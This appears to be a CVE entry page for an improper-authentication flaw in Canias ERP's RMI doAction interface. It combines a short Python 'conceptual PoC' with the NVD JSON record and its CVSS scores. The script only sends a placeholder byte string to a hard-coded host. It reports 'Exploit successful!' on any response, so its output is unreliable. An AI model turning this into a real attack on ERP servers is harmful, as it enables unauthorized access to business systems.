CVE-2026-8214

import socket import struct # This is a conceptual PoC for demonstrating the sessionId manipulation logic. # Real RMI exploitation requires handling Java Serialization protocols. def send_rmi_exploit(host, port): try: # 1. Connect to the RMI service port (usually 1099) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print(f"[*] Connected to {host}:{port}") # 2. Construct the malicious payload targeting 'doAction' # In a real scenario, this involves crafting JRMP protocol stream # with a manipulated 'sessionId' argument. # Placeholder for the RMI protocol header and call data # We simulate passing a malicious sessionId like 'admin' or NULL payload = b"RMI_PROTOCOL_HEADER" + b"doAction" + b"malicious_sessionId" # 3. Send payload s.send(payload) print("[*] Sending malicious payload with manipulated sessionId...") # 4. Receive response response = s.recv(1024) if response: print("[+] Exploit successful! Received response:") print(response) else: print("[-] No response received.") except Exception as e: print(f"[-] Error: {e}") finally: s.close() # Configuration target_host = "192.168.1.100" target_port = 1099 # Execute send_rmi_exploit(target_host, target_port)

{"cve": {"id": "CVE-2026-8214", "sourceIdentifier": "[email protected]", "published": "2026-05-10T01:16:07.907", "lastModified": "2026-05-11T15:08:09.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Industrial Application Software IAS Canias ERP 8.03. This affects the function doAction of the component RMI Interface. The manipulation of the argument sessionId results in improper authentication. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://gist.github.com/0xb1lal/3ef872a445310c5866d07d6a5b1803fa", "source": "[email protected]"}, {"url": "https://hawktrace.com/blog/caniaserp/", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/808238", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362431", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/362431/cti", "source": "[email protected]"}]}}